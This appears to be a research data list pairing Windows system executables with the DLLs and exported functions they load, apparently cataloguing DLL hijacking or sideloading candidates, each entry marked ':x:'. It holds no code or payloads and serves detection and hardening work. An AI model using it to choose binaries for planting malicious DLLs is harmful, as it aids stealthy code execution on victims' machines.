:x: compmgmtlauncher.exe PROPSYS.dll DllMain
:x: compmgmtlauncher.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: compmgmtlauncher.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: ctfmon.exe MsCtfMonitor.DLL DllMain
:x: ctfmon.exe MsCtfMonitor.DLL DoMsCtfMonitor
:x: ctfmon.exe MSUTB.dll DllMain
:x: ctfmon.exe WINSTA.dll DllMain
:x: cttune.exe DWrite.dll DllMain
:x: cttune.exe DWrite.dll DWriteCreateFactory
:x: cttune.exe OLEACC.dll DllMain
:x: cttune.exe UxTheme.dll DllMain
:x: dataexchangehost.exe d2d1.dll DllMain
:x: dataexchangehost.exe d3d11.dll DllMain
:x: dataexchangehost.exe DWrite.dll DllMain
:x: dataexchangehost.exe dxgi.dll DllMain
:x: datausagelivetiletask.exe dusmapi.dll DllMain
:x: datausagelivetiletask.exe IPHLPAPI.DLL DllMain
:x: ddodiag.exe XmlLite.dll CreateXmlReader
:x: ddodiag.exe XmlLite.dll DllMain
:x: deploymentcsphelper.exe dbgcore.DLL DllMain
:x: deploymentcsphelper.exe DismApi.DLL DllMain
:x: deploymentcsphelper.exe WDSCORE.dll ConstructPartialMsgVW
:x: deploymentcsphelper.exe WDSCORE.dll CurrentIP
:x: deploymentcsphelper.exe WDSCORE.dll DllMain
:x: deploymentcsphelper.exe WDSCORE.dll WdsInitialize
:x: deploymentcsphelper.exe WDSCORE.dll WdsSetupLogMessageW
:x: deploymentcsphelper.exe WDSCORE.dll WdsTerminate
:x: devicecensus.exe dcntel.dll DllMain
:x: devicecensus.exe dcntel.dll GetCensusRegistryLocation
:x: devicecensus.exe dcntel.dll RunSystemContextCensus
:x: devicecensus.exe dcntel.dll SetCustomTrigger
:x: devicecensus.exe dcntel.dll SetCustomTriggerEx
:x: devicecensus.exe IPHLPAPI.DLL DllMain
:x: devicecensus.exe IPHLPAPI.DLL GetAdaptersInfo
:x: devicecensus.exe logoncli.dll DllMain
:x: devicecensus.exe logoncli.dll DsGetDcNameW
:x: devicecensus.exe netutils.dll DllMain
:x: devicecensus.exe netutils.dll NetApiBufferAllocate
:x: devicecensus.exe WINHTTP.dll DllMain
:x: devicecredentialdeployment.exe DeviceCredential.dll DllMain
:x: deviceenroller.exe DEVOBJ.dll DllMain
:x: deviceenroller.exe DMCmnUtils.dll CopyString
:x: deviceenroller.exe DMCmnUtils.dll DllMain
:x: deviceenroller.exe dmEnrollEngine.DLL DllMain
:x: deviceenroller.exe dmenterprisediagnostics.dll DllMain
:x: deviceenroller.exe iri.dll DllMain
:x: deviceenroller.exe netutils.dll DllMain
:x: deviceenroller.exe omadmapi.dll DllMain
:x: deviceenroller.exe omadmapi.dll FreeCommandLineOptions
:x: deviceenroller.exe omadmapi.dll ProcessCommandLine
:x: deviceenroller.exe samcli.dll DllMain
:x: deviceenroller.exe USERENV.dll DllMain
:x: deviceenroller.exe XmlLite.dll DllMain
:x: devicepairingwizard.exe dwmapi.dll DllMain
:x: devicepairingwizard.exe dwmapi.dll DwmExtendFrameIntoClientArea
:x: devicepairingwizard.exe OLEACC.dll DllMain
:x: devicepairingwizard.exe OLEACC.dll GetRoleTextW
:x: dfrgui.exe SXSHARED.dll DllMain
:x: dfrgui.exe SXSHARED.dll SxTracerGetThreadContextRetail
:x: dialer.exe rtutils.dll DllMain
:x: dialer.exe rtutils.dll TraceRegisterExW
:x: dialer.exe rtutils.dll TraceVprintfExA
:x: dialer.exe SspiCli.dll DllMain
:x: dialer.exe SspiCli.dll GetUserNameExW
:x: dialer.exe TAPI32.dll DllMain
:x: dialer.exe TAPI32.dll lineInitializeExW
:x: disksnapshot.exe CRYPTBASE.dll DllMain
:x: disksnapshot.exe CRYPTBASE.dll SystemFunction036
:x: dispdiag.exe DEVOBJ.dll DevObjCreateDeviceInfoList
:x: dispdiag.exe DEVOBJ.dll DevObjDestroyDeviceInfoList
:x: dispdiag.exe DEVOBJ.dll DevObjGetClassDevs
:x: dispdiag.exe DEVOBJ.dll DllMain
:x: dispdiag.exe DXVA2.dll DllMain
:x: dispdiag.exe DXVA2.dll GetNumberOfPhysicalMonitorsFromHMONITOR
:x: dispdiag.exe WMICLNT.dll DllMain
:x: dispdiag.exe WMICLNT.dll WmiDevInstToInstanceNameW
:x: dispdiag.exe WMICLNT.dll WmiOpenBlock
:x: displayswitch.exe dwmapi.dll DllMain
:x: displayswitch.exe policymanager.dll DllMain
:x: displayswitch.exe policymanager.dll PolicyManager_GetPolicyInt
:x: displayswitch.exe UxTheme.dll DllMain
:x: displayswitch.exe WINSTA.dll DllMain
:x: djoin.exe dbgcore.DLL DllMain
:x: djoin.exe JOINUTIL.DLL DllMain
:x: djoin.exe logoncli.dll DllMain
:x: djoin.exe netutils.dll DllMain
:x: djoin.exe netutils.dll NetApiBufferFree
:x: djoin.exe wdscore.dll ConstructPartialMsgVW
:x: djoin.exe wdscore.dll CurrentIP
:x: djoin.exe wdscore.dll DllMain
:x: djoin.exe wdscore.dll WdsSetupLogDestroy
:x: djoin.exe wdscore.dll WdsSetupLogInit
:x: djoin.exe wdscore.dll WdsSetupLogMessageW
:x: djoin.exe wkscli.dll DllMain
:x: dmcertinst.exe certenroll.dll DllMain
:x: dmcertinst.exe DMCmnUtils.dll DllMain
:x: dmcertinst.exe DSPARSE.dll DllMain
:x: dmcertinst.exe iri.dll DllMain
:x: dmcertinst.exe omadmapi.dll DllMain
:x: dmcertinst.exe omadmapi.dll ProcessCommandLine
:x: dmcfghost.exe DMCmnUtils.dll DllMain
:x: dmcfghost.exe DMPushProxy.dll DllMain
:x: dmcfghost.exe DMPushProxy.dll PushRouter_FreeGetMessageEventName
:x: dmcfghost.exe DMPushProxy.dll PushRouter_Open
:x: dmcfghost.exe dmxmlhelputils.dll DllMain
:x: dmcfghost.exe dsclient.dll DllMain
:x: dmcfghost.exe iri.dll DllMain
:x: dmcfghost.exe omadmapi.dll DllMain
:x: dmcfghost.exe XmlLite.dll DllMain
:x: dmclient.exe WINHTTP.dll DllMain
:x: dmclient.exe XmlLite.dll DllMain
:x: dmnotificationbroker.exe DMCmnUtils.dll DllMain
:x: dmomacpmo.exe DEVOBJ.dll DllMain
:x: dmomacpmo.exe DMCmnUtils.dll DllMain
:x: dmomacpmo.exe dmEnrollEngine.DLL DllMain
:x: dmomacpmo.exe DMProcessXMLFiltered.dll DllMain
:x: dmomacpmo.exe dsclient.dll DllMain
:x: dmomacpmo.exe iri.dll DllMain
:x: dmomacpmo.exe omadmapi.dll DllMain
:x: dmomacpmo.exe omadmapi.dll ProcessCommandLine
:x: dmomacpmo.exe USERENV.dll DllMain
:x: dmomacpmo.exe XmlLite.dll DllMain
:x: dnscacheugc.exe dbgcore.DLL DllMain
:x: dnscacheugc.exe IPHLPAPI.DLL DllMain
:x: dnscacheugc.exe wdscore.dll ConstructPartialMsgVW
:x: dnscacheugc.exe wdscore.dll CurrentIP
:x: dnscacheugc.exe wdscore.dll DllMain
:x: dnscacheugc.exe wdscore.dll WdsSetupLogDestroy
:x: dnscacheugc.exe wdscore.dll WdsSetupLogInit
:x: dnscacheugc.exe wdscore.dll WdsSetupLogMessageW
:x: dpapimig.exe netutils.dll DllMain
:x: dpapimig.exe netutils.dll NetApiBufferFree
:x: dpapimig.exe samcli.dll DllMain
:x: dpapimig.exe samcli.dll NetUserModalsGet
:x: dpapimig.exe SAMLIB.dll DllMain
:x: dpapimig.exe SAMLIB.dll SamConnect
:x: dpapimig.exe SAMLIB.dll SamEnumerateDomainsInSamServer
:x: dpapimig.exe SAMLIB.dll SamFreeMemory
:x: dpiscaling.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: dpiscaling.exe CLDAPI.dll DllMain
:x: dpiscaling.exe CRYPTBASE.DLL DllMain
:x: dpiscaling.exe edputil.dll DllMain
:x: dpiscaling.exe edputil.dll EdpGetIsManaged
:x: dpiscaling.exe FLTLIB.DLL DllMain
:x: dpiscaling.exe PROPSYS.dll DllMain
:x: dpiscaling.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: dpiscaling.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: driverquery.exe netutils.dll DllMain
:x: driverquery.exe srvcli.dll DllMain
:x: driverquery.exe SspiCli.dll DllMain
:x: drvinst.exe DEVOBJ.dll DllMain
:x: drvinst.exe DEVRTL.dll DllMain
:x: dsregcmd.exe dsreg.dll DllMain
:x: dsregcmd.exe logoncli.dll DllMain
:x: dsregcmd.exe netutils.dll DllMain
:x: dsregcmd.exe PROPSYS.dll DllMain
:x: dsregcmd.exe SSPICLI.DLL DllMain
:x: dsregcmd.exe USERENV.dll DllMain
:x: dsregcmd.exe WINHTTP.dll DllMain
:x: dsregcmd.exe WININET.dll DllMain
:x: dsregcmd.exe wkscli.dll DllMain
:x: dstokenclean.exe dsclient.dll DllMain
:x: dstokenclean.exe dsclient.dll DSRemoveExpiredTokens
:x: dwm.exe CoreMessaging.dll DllMain
:x: dwm.exe d2d1.dll DllMain
:x: dwm.exe d3d11.dll DllMain
:x: dwm.exe D3DCOMPILER_47.dll DllMain
:x: dwm.exe dwmcore.dll DllMain
:x: dwm.exe dxgi.dll DllMain
:x: dwm.exe dxgi.dll DXGIDeclareAdapterRemovalSupport
:x: dwwin.exe wer.dll DllMain
:x: dxgiadaptercache.exe d3d11.dll DllMain
:x: dxgiadaptercache.exe d3d12.dll DllMain
:x: dxgiadaptercache.exe dxgi.dll DllMain
:x: dxpserver.exe dwmapi.dll DllMain
:x: dxpserver.exe msi.dll DllMain
:x: dxpserver.exe PROPSYS.dll DllMain
:x: dxpserver.exe XmlLite.dll DllMain
:x: easeofaccessdialog.exe OLEACC.dll DllMain
:x: edpcleanup.exe DMCmnUtils.dll DllMain
:x: edpcleanup.exe DNSAPI.dll DllMain
:x: edpcleanup.exe FirewallAPI.dll DllMain
:x: edpcleanup.exe fwbase.dll DllMain
:x: edpcleanup.exe fwbase.dll FwCriticalSectionCreate
:x: edpcleanup.exe fwbase.dll FwCriticalSectionDestroy
:x: edpcleanup.exe netutils.dll DllMain
:x: edpcleanup.exe policymanager.dll DllMain
:x: edpcleanup.exe SspiCli.dll DllMain
:x: edpcleanup.exe wkscli.dll DllMain
:x: eduprintprov.exe deviceassociation.dll DllMain
:x: eduprintprov.exe policymanager.dll DllMain
:x: eduprintprov.exe policymanager.dll PolicyManager_GetPolicy
:x: eduprintprov.exe SspiCli.dll DllMain
:x: eduprintprov.exe SspiCli.dll GetUserNameExW
:x: efsui.exe credui.dll DllMain
:x: efsui.exe CRYPTBASE.DLL DllMain
:x: efsui.exe CRYPTUI.dll DllMain
:x: efsui.exe DSROLE.dll DllMain
:x: efsui.exe EFSADU.dll DllMain
:x: efsui.exe EFSUTIL.dll DllMain
:x: efsui.exe FeClient.dll DllMain
:x: efsui.exe logoncli.dll DllMain
:x: efsui.exe netutils.dll DllMain
:x: efsui.exe USERENV.dll DllMain
:x: efsui.exe VAULTCLI.dll DllMain
:x: ehstorauthn.exe UxTheme.dll DllMain
:x: esentutl.exe ESENT.dll DllMain
:x: eventcreate.exe netutils.dll DllMain
:x: eventcreate.exe srvcli.dll DllMain
:x: eventcreate.exe SspiCli.dll DllMain
:x: expand.exe Cabinet.dll DllMain
:x: extrac32.exe Cabinet.dll DllMain
:x: fhmanagew.exe fhsvcctl.dll DllMain
:x: filehistory.exe CRYPTBASE.dll DllMain
:x: filehistory.exe CRYPTBASE.dll SystemFunction036
:x: filehistory.exe UxTheme.dll DllMain
:x: filehistory.exe UxTheme.dll EnableThemeDialogTexture
:x: filehistory.exe UxTheme.dll OpenThemeData
:x: fixmapi.exe mapistub.dll DllMain
:x: fixmapi.exe mapistub.dll FixMAPI
:x: fltmc.exe FLTLIB.DLL DllMain
:x: fltmc.exe FLTLIB.DLL FilterFindFirst
:x: fltmc.exe FLTLIB.DLL FilterFindNext
:x: fondue.exe msi.dll DllMain
:x: fondue.exe osbaseln.dll DllMain
:x: fondue.exe PROPSYS.dll DllMain
:x: fsiso.exe iumbase.DLL DllMain
:x: fsquirt.exe DEVOBJ.dll DevObjCreateDeviceInfoList
:x: fsquirt.exe DEVOBJ.dll DevObjDestroyDeviceInfoList
:x: fsquirt.exe DEVOBJ.dll DevObjGetClassDevs
:x: fsquirt.exe DEVOBJ.dll DllMain
:x: fsquirt.exe dwmapi.dll DllMain
:x: fsquirt.exe dwmapi.dll DwmExtendFrameIntoClientArea
:x: fsquirt.exe OLEACC.dll DllMain
:x: fsquirt.exe OLEACC.dll GetRoleTextW
:x: ftp.exe SspiCli.dll DllMain
:x: fvenotify.exe FVEAPI.dll DllMain
:x: fvenotify.exe FVEAPI.dll FveFindFirstVolume
:x: fvenotify.exe FVEAPI.dll FveFindNextVolume
:x: fvenotify.exe FVEAPI.dll FveGetStatus
:x: fvenotify.exe FVEAPI.dll FveGetVolumeNameW
:x: fvenotify.exe FVEAPI.dll FveIsVolumeEncryptable
:x: fvenotify.exe FVEAPI.dll FveOpenVolumeByHandle
:x: fvenotify.exe FVEAPI.dll FveOpenVolumeW
:x: fveprompt.exe FVEAPI.dll DllMain
:x: fxscover.exe IPHLPAPI.DLL DllMain
:x: fxscover.exe IPHLPAPI.DLL GetAdaptersAddresses
:x: fxssvc.exe credui.dll DllMain
:x: fxssvc.exe FXSTIFF.dll DllMain
:x: fxssvc.exe IPHLPAPI.DLL DllMain
:x: fxssvc.exe PROPSYS.dll DllMain
:x: fxssvc.exe TAPI32.dll DllMain
:x: gamepanel.exe d2d1.dll DllMain
:x: gamepanel.exe d3d11.dll DllMain
:x: gamepanel.exe dcomp.dll DllMain
:x: gamepanel.exe dwmapi.dll DllMain
:x: gamepanel.exe dwmapi.dll DwmSetWindowAttribute
:x: gamepanel.exe DWrite.dll DllMain
:x: gamepanel.exe DWrite.dll DWriteCreateFactory
:x: gamepanel.exe dxgi.dll CreateDXGIFactory2
:x: gamepanel.exe dxgi.dll DllMain
:x: gamepanel.exe msdrm.dll DllMain
:x: gamepanel.exe UIAutomationCore.DLL DllMain
:x: gamepanel.exe UxTheme.dll DllMain
:x: gamepanel.exe UxTheme.dll EnableThemeDialogTexture
:x: gamepanel.exe UxTheme.dll OpenThemeData
:x: genvalobj.exe bcd.dll DllMain
:x: getmac.exe netutils.dll DllMain
:x: getmac.exe srvcli.dll DllMain
:x: getmac.exe SspiCli.dll DllMain
:x: getmac.exe wkscli.dll DllMain
:x: gpresult.exe logoncli.dll DllMain
:x: gpresult.exe netutils.dll DllMain
:x: gpresult.exe NTDSAPI.dll DllMain
:x: gpresult.exe Secur32.dll DllMain
:x: gpresult.exe srvcli.dll DllMain
:x: gpresult.exe SspiCli.dll DllMain
:x: gpupdate.exe USERENV.dll DllMain
:x: gpupdate.exe wevtapi.dll DllMain
:x: hvax64.exe KDSTUB.dll DllMain
:x: hvix64.exe KDSTUB.dll DllMain
:x: hvsievaluator.exe DismApi.DLL DllMain
:x: hvsievaluator.exe DMCmnUtils.dll DllMain
:x: hvsievaluator.exe iri.dll DllMain
:x: hvsievaluator.exe omadmapi.dll DllMain
:x: hvsievaluator.exe policymanager.dll DllMain
:x: hvsievaluator.exe policymanager.dll PolicyManager_GetPolicyInt
:x: ie4uinit.exe CRYPTBASE.DLL DllMain
:x: ie4uinit.exe IEADVPACK.dll DllMain
:x: ie4uinit.exe iedkcs32.dll DllMain
:x: ie4uinit.exe MLANG.dll DllMain
:x: ie4uinit.exe netutils.dll DllMain
:x: ie4uinit.exe WININET.dll DllMain
:x: ie4uinit.exe wkscli.dll DllMain
:x: ieunatt.exe dbgcore.DLL DllMain
:x: klist.exe secur32.dll DllMain
:x: ksetup.exe logoncli.dll DllMain
:x: ksetup.exe netutils.dll DllMain
:x: ksetup.exe srvcli.dll DllMain
:x: ksetup.exe SspiCli.dll DllMain
:x: label.exe DEVOBJ.dll DllMain
:x: licensingdiag.exe Cabinet.dll DllMain
:x: licensingdiag.exe Cabinet.dll FCICreate
:x: licensingdiag.exe CLIPC.dll ClipGatherDiagnostics
:x: licensingdiag.exe CLIPC.dll ClipGenerateDeviceLicenseRequest
:x: licensingdiag.exe CLIPC.dll ClipGetLicenseAndPolicyForPfn
:x: licensingdiag.exe CLIPC.dll ClipOpen
:x: licensingdiag.exe CLIPC.dll DllMain
:x: lockscreencontentserver.exe dwmapi.dll DllMain
:x: lpksetup.exe CRYPTBASE.dll DllMain
:x: lpksetup.exe CRYPTBASE.dll SystemFunction036
:x: lpksetup.exe dpx.dll DllMain
:x: lpremove.exe AppXAllUserStore.dll DllMain
:x: lpremove.exe AppXAllUserStore.dll IsNonInboxAllUserPackage
:x: lpremove.exe AppXDeploymentClient.dll DllMain
:x: lpremove.exe Bcp47Langs.dll Bcp47GetMuiForm
:x: lpremove.exe Bcp47Langs.dll DllMain
:x: lpremove.exe Bcp47Langs.dll GetUserLanguagesForUser
:x: lpremove.exe DNSAPI.dll DllMain
:x: lpremove.exe FirewallAPI.dll DllMain
:x: lpremove.exe fwbase.dll DllMain
:x: lpremove.exe fwbase.dll FwCriticalSectionCreate
:x: lpremove.exe fwbase.dll FwCriticalSectionDestroy
:x: lpremove.exe StateRepository.Core.dll DllMain
:x: magnify.exe d3d9.dll DllMain
:x: magnify.exe MAGNIFICATION.dll DllMain
:x: magnify.exe MAGNIFICATION.dll MagInitialize
:x: magnify.exe MAGNIFICATION.dll MagSetFullscreenTransform
:x: magnify.exe MAGNIFICATION.dll MagSetFullscreenUseBitmapSmoothing
:x: magnify.exe MAGNIFICATION.dll MagSetInputTransform
:x: magnify.exe MAGNIFICATION.dll MagShowSystemCursor
:x: magnify.exe MAGNIFICATION.dll MagUninitialize
:x: magnify.exe OLEACC.dll DllMain
:x: magnify.exe UIAutomationCore.DLL DllMain
:x: magnify.exe WTSAPI32.dll DllMain
:x: makecab.exe Cabinet.dll DllMain
:x: mcbuilder.exe bcp47mrm.dll DllMain
:x: mcbuilder.exe bcp47mrm.dll IsWellFormedTag
:x: mcbuilder.exe mrmcoreR.dll DllMain
:x: mcbuilder.exe mrmcoreR.dll MergeSystemPriFiles
:x: mdeserver.exe d3d11.dll DllMain
:x: mdeserver.exe dxgi.dll DllMain
:x: mdeserver.exe MFPlat.DLL DllMain
:x: mdeserver.exe MFPlat.DLL MFStartup
:x: mdeserver.exe RTWorkQ.DLL DllMain
:x: mdeserver.exe RTWorkQ.DLL RtwqRegisterPlatformEvents
:x: mdeserver.exe RTWorkQ.DLL RtwqStartup
:x: mdeserver.exe SspiCli.dll DllMain
:x: mdeserver.exe winmde.dll DllMain
:x: mdmappinstaller.exe DEVOBJ.dll DllMain
:x: mdmappinstaller.exe DMCmnUtils.dll DllMain
:x: mdmappinstaller.exe dmEnrollEngine.DLL DllMain
:x: mdmappinstaller.exe iri.dll DllMain
:x: mdmappinstaller.exe msi.dll DllMain
:x: mdmappinstaller.exe omadmapi.dll DllMain
:x: mdmappinstaller.exe USERENV.dll DllMain
:x: mdmappinstaller.exe WTSAPI32.dll DllMain
:x: mdmdiagnosticstool.exe DEVOBJ.dll DllMain
:x: mdmdiagnosticstool.exe DMCmnUtils.dll DllMain
:x: mdmdiagnosticstool.exe dmEnrollEngine.DLL DllMain
:x: mdmdiagnosticstool.exe dmiso8601utils.dll DllMain
:x: mdmdiagnosticstool.exe DynamoAPI.dll DllMain
:x: mdmdiagnosticstool.exe iri.dll DllMain
:x: mdmdiagnosticstool.exe MdmDiagnostics.dll DllMain
:x: mdmdiagnosticstool.exe omadmapi.dll DllMain
:x: mdmdiagnosticstool.exe policymanager.dll DllMain
:x: mdmdiagnosticstool.exe tbs.dll DllMain
:x: mdmdiagnosticstool.exe USERENV.dll DllMain
:x: mdmdiagnosticstool.exe WINHTTP.dll DllMain
:x: mdmdiagnosticstool.exe WININET.dll DllMain
:x: mdmdiagnosticstool.exe XmlLite.dll DllMain
:x: mfpmp.exe CRYPTBASE.DLL DllMain
:x: mfpmp.exe ksuser.dll DllMain
:x: mfpmp.exe MFCORE.dll DllMain
:x: mfpmp.exe MFPlat.DLL DllMain
:x: mfpmp.exe MFPlat.DLL MFGetCallStackTracingWeakReference
:x: mfpmp.exe MFPlat.DLL MFShutdown
:x: mfpmp.exe RTWorkQ.DLL DllMain
:x: mfpmp.exe RTWorkQ.DLL RtwqRegisterPlatformEvents
:x: mfpmp.exe RTWorkQ.DLL RtwqShutdown
:x: microsoft.uev.cscunpintool.exe CSCAPI.dll DllMain
:x: microsoft.uev.cscunpintool.exe CSCAPI.dll OfflineFilesQueryStatus
:x: microsoftedgebchost.exe iertutil.dll DllMain
:x: microsoftedgebchost.exe USERENV.dll DllMain
:x: microsoftedgecp.exe iertutil.dll DllMain
:x: microsoftedgecp.exe USERENV.dll DllMain
:x: microsoftedgedevtools.exe iertutil.dll DllMain
:x: microsoftedgesh.exe USERENV.dll DllMain
:x: microsoftedgesh.exe USERENV.dll GetAppContainerRegistryLocation
:x: mobsync.exe edputil.dll DllMain
:x: mobsync.exe edputil.dll EdpGetIsManaged
:x: mobsync.exe PROPSYS.dll DllMain
:x: mobsync.exe PROPSYS.dll PSGetNameFromPropertyKey
:x: mobsync.exe PROPSYS.dll PSStringFromPropertyKey
:x: mobsync.exe PROPSYS.dll VariantToString
:x: mousocoreworker.exe winsqlite3.dll DllMain
:x: msdt.exe ATL.DLL DllMain
:x: msdt.exe Cabinet.dll DllMain
:x: msdt.exe SSPICLI.DLL DllMain
:x: msdt.exe SSPICLI.DLL GetUserNameExW
:x: msdt.exe UxTheme.dll DllMain
:x: msdt.exe wer.dll DllMain
:x: msdt.exe WINHTTP.dll DllMain
:x: msdtc.exe CLUSAPI.dll DllMain
:x: msdtc.exe DNSAPI.dll DllMain
:x: msdtc.exe ktmw32.dll DllMain
:x: msdtc.exe MSDTCTM.dll DllMain
:x: msdtc.exe MSDTCTM.dll DtcMainExt
:x: msdtc.exe MTXCLU.DLL DllMain
:x: msdtc.exe RESUTILS.dll DllMain
:x: msdtc.exe XOLEHLP.dll DllMain
:x: msg.exe WINSTA.dll DllMain
:x: mshta.exe CRYPTBASE.DLL DllMain
:x: mshta.exe netutils.dll DllMain
:x: mshta.exe srpapi.dll DllMain
:x: mshta.exe srpapi.dll SrpGetEnterpriseIds
:x: mshta.exe SspiCli.dll DllMain
:x: mshta.exe SspiCli.dll GetUserNameExW
:x: mshta.exe WINHTTP.dll DllMain
:x: mshta.exe wkscli.dll DllMain
:x: mshta.exe WLDP.DLL DllMain
:x: mshta.exe WLDP.DLL WldpGetLockdownPolicy
:x: msiexec.exe msi.dll DllMain
:x: msiexec.exe msi.dll MsiLoadStringW
:x: msiexec.exe msi.dll MsiMessageBoxExW
:x: msinfo32.exe ATL.DLL DllMain
:x: msinfo32.exe SLC.dll DllMain
:x: msinfo32.exe sppc.dll DllMain
:x: mspaint.exe MSFTEDIT.DLL DllMain
:x: mspaint.exe PROPSYS.dll DllMain
:x: msra.exe IPHLPAPI.DLL DllMain
:x: msra.exe IPHLPAPI.DLL GetAdaptersAddresses
:x: msra.exe IPHLPAPI.DLL NotifyUnicastIpAddressChange
:x: msra.exe NDFAPI.DLL DllMain
:x: msra.exe SspiCli.dll DllMain
:x: msra.exe SspiCli.dll GetUserNameExA
:x: msra.exe SspiCli.dll GetUserNameExW
:x: msra.exe USERENV.dll DllMain
:x: msra.exe USERENV.dll GetProfileType
:x: msra.exe UxTheme.dll DllMain
:x: msra.exe UxTheme.dll IsAppThemed
:x: msra.exe UxTheme.dll IsThemeActive
:x: msra.exe UxTheme.dll OpenThemeData
:x: msra.exe wdi.dll DllMain
:x: mstsc.exe credui.dll DllMain
:x: mstsc.exe CRYPTBASE.DLL DllMain
:x: mstsc.exe CRYPTUI.dll DllMain
:x: mstsc.exe IPHLPAPI.DLL DllMain
:x: mstsc.exe ktmw32.dll DllMain
:x: mstsc.exe NETUTILS.DLL DllMain
:x: mstsc.exe SSPICLI.DLL DllMain
:x: mstsc.exe WINHTTP.dll DllMain
:x: mstsc.exe WININET.dll DllMain
:x: mstsc.exe WKSCLI.DLL DllMain
:x: mtstocom.exe SspiCli.dll DllMain
:x: muiunattend.exe dbgcore.DLL DllMain
:x: muiunattend.exe SspiCli.dll DllMain
:x: muiunattend.exe wdscore.dll ConstructPartialMsgVW
:x: muiunattend.exe wdscore.dll CurrentIP
:x: muiunattend.exe wdscore.dll DllMain
:x: muiunattend.exe wdscore.dll WdsSetupLogInit
:x: muiunattend.exe wdscore.dll WdsSetupLogMessageW
:x: musnotification.exe Cabinet.dll DllMain
:x: musnotification.exe UpdatePolicy.dll DllMain
:x: musnotification.exe UPShared.dll DllMain
:x: musnotification.exe USERENV.dll DllMain
:x: musnotification.exe WINHTTP.dll DllMain
:x: musnotification.exe WINSTA.dll DllMain
:x: musnotification.exe WINSTA.dll WinStationEnumerateW
:x: musnotificationux.exe Cabinet.dll DllMain
:x: musnotificationux.exe DMCmnUtils.dll DllMain
:x: musnotificationux.exe UpdatePolicy.dll DllMain
:x: musnotificationux.exe UPShared.dll DllMain
:x: musnotificationux.exe WINHTTP.dll DllMain
:x: musnotificationux.exe XmlLite.dll DllMain
:x: musnotifyicon.exe DMCmnUtils.dll DllMain
:x: musnotifyicon.exe UPShared.dll DllMain
:x: musnotifyicon.exe WINHTTP.dll DllMain
:x: musnotifyicon.exe XmlLite.dll DllMain
:x: nbtstat.exe IPHLPAPI.DLL DllMain
:x: net.exe IPHLPAPI.DLL DllMain
:x: net.exe netutils.dll DllMain
:x: net.exe netutils.dll NetApiBufferAllocate
:x: net.exe samcli.dll DllMain
:x: net.exe srvcli.dll DllMain
:x: net.exe wkscli.dll DllMain
:x: net1.exe CRYPTBASE.dll DllMain
:x: net1.exe DSROLE.dll DllMain
:x: net1.exe logoncli.dll DllMain
:x: net1.exe netutils.dll DllMain
:x: net1.exe netutils.dll NetApiBufferAllocate
:x: net1.exe samcli.dll DllMain
:x: net1.exe srvcli.dll DllMain
:x: net1.exe wkscli.dll DllMain
:x: netbtugc.exe dbgcore.DLL DllMain
:x: netbtugc.exe IPHLPAPI.DLL DllMain
:x: netbtugc.exe wdscore.dll ConstructPartialMsgVA
:x: netbtugc.exe wdscore.dll CurrentIP
:x: netbtugc.exe wdscore.dll DllMain
:x: netbtugc.exe wdscore.dll WdsSetupLogDestroy
:x: netbtugc.exe wdscore.dll WdsSetupLogInit
:x: netbtugc.exe wdscore.dll WdsSetupLogMessageA
:x: nethost.exe RASAPI32.dll DllMain
:x: nethost.exe RASAPI32.dll RasConfigUserProxySettingsW
:x: nethost.exe rasman.dll DllMain
:x: nethost.exe rtutils.dll DllMain
:x: nethost.exe rtutils.dll TraceRegisterExA
:x: netiougc.exe dbgcore.DLL DllMain
:x: netiougc.exe dhcpcsvc.DLL DllMain
:x: netiougc.exe IPHLPAPI.DLL DllMain
:x: netiougc.exe wdscore.dll ConstructPartialMsgVA
:x: netiougc.exe wdscore.dll CurrentIP
:x: netiougc.exe wdscore.dll DllMain
:x: netiougc.exe wdscore.dll WdsSetupLogDestroy
:x: netiougc.exe wdscore.dll WdsSetupLogInit
:x: netiougc.exe wdscore.dll WdsSetupLogMessageA
:x: netsh.exe adsldpc.dll DllMain
:x: netsh.exe AUTHFWCFG.DLL DllMain
:x: netsh.exe AUTHFWCFG.DLL InitHelperDll
:x: netsh.exe Cabinet.dll DllMain
:x: netsh.exe CRYPTBASE.DLL DllMain
:x: netsh.exe DHCPCMONITOR.DLL DllMain
:x: netsh.exe DHCPCMONITOR.DLL InitHelperDll
:x: netsh.exe dhcpcsvc.DLL DllMain
:x: netsh.exe dhcpcsvc6.DLL DllMain
:x: netsh.exe DNSAPI.dll DllMain
:x: netsh.exe dot3api.dll DllMain
:x: netsh.exe DOT3CFG.DLL DllMain
:x: netsh.exe DOT3CFG.DLL InitHelperDll
:x: netsh.exe eappcfg.dll DllMain
:x: netsh.exe eappprxy.dll DllMain
:x: netsh.exe FirewallAPI.dll DllMain
:x: netsh.exe FirewallAPI.dll FwAlloc
:x: netsh.exe FirewallAPI.dll FwFree
:x: netsh.exe fwbase.dll DllMain
:x: netsh.exe fwbase.dll FwAlloc
:x: netsh.exe fwbase.dll FwBaseAlloc
:x: netsh.exe fwbase.dll FwBaseFree
:x: netsh.exe fwbase.dll FwCriticalSectionCreate
:x: netsh.exe fwbase.dll FwReportErrorAsWinError
:x: netsh.exe FWCFG.DLL DllMain
:x: netsh.exe FWCFG.DLL InitHelperDll
:x: netsh.exe FWPolicyIOMgr.dll DllMain
:x: netsh.exe fwpuclnt.dll DllMain
:x: netsh.exe HNETMON.DLL DllMain
:x: netsh.exe HNETMON.DLL InitHelperDll
:x: netsh.exe HTTPAPI.dll DllMain
:x: netsh.exe HTTPAPI.dll HttpInitialize
:x: netsh.exe IFMON.DLL DllMain
:x: netsh.exe IFMON.DLL InitHelperDll
:x: netsh.exe IPHLPAPI.DLL DllMain
:x: netsh.exe IPHLPAPI.DLL GetDefaultCompartmentId
:x: netsh.exe ktmw32.dll CreateTransaction
:x: netsh.exe ktmw32.dll DllMain
:x: netsh.exe mintdh.dll DllMain
:x: netsh.exe mintdh.dll TdhpSetWbemExtensionBlock
:x: netsh.exe MobileNetworking.dll DllMain
:x: netsh.exe NDFAPI.DLL DllMain
:x: netsh.exe NETIOHLP.DLL DllMain
:x: netsh.exe NETIOHLP.DLL InitHelperDll
:x: netsh.exe netshell.dll DllMain
:x: netsh.exe NETTRACE.DLL DllMain
:x: netsh.exe NETTRACE.DLL InitHelperDll
:x: netsh.exe nlaapi.dll DllMain
:x: netsh.exe NSHHTTP.DLL DllMain
:x: netsh.exe NSHHTTP.DLL InitHelperDll
:x: netsh.exe NSHIPSEC.DLL DllMain
